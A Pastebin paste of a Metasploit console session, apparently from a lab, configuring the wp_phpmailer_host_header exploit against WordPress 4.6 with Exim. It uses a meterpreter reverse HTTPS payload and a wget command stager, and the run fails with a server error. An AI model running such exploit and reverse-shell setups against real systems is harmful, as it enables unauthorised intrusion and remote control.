Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(unix/webapp/wp_phpmailer_host_header) > show options
- Module options (exploit/unix/webapp/wp_phpmailer_host_header):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
- RHOST 192.168.1.181 yes The target address
- RPORT 80 yes The target port (TCP)
- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
- SRVPORT 8080 yes The local port to listen on.
- SSL false no Negotiate SSL/TLS for outgoing connections
- SSLCert no Path to a custom SSL certificate (default is randomly generated)
- TARGETURI /backup_wordpress yes The base path to the wordpress application
- USERNAME john yes WordPress username
- Payload options (linux/x64/meterpreter_reverse_https):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LHOST 192.168.1.124 yes The local listener hostname
- LPORT 8443 yes The local listener port
- LURI no The HTTP Path
- Exploit target:
- Id Name
- -- ----
- 0 WordPress 4.6 / Exim
- msf exploit(unix/webapp/wp_phpmailer_host_header) >
- msf exploit(unix/webapp/wp_phpmailer_host_header) > exploit
- [*] Started HTTPS reverse handler on https://192.168.1.124:8443
- [*] Generating wget command stager
- [*] Using URL: http://0.0.0.0:8080/iwwfxiim
- [*] Local IP: http://192.168.1.124:8080/iwwfxiim
- [*] Generating and sending Exim prestager
- [-] Exploit aborted due to failure: unexpected-reply: Server returned code 500
- [*] Server stopped.
- [*] Exploit completed, but no session was created.
- msf exploit(unix/webapp/wp_phpmailer_host_header) >
Add Comment
Please, Sign In to add comment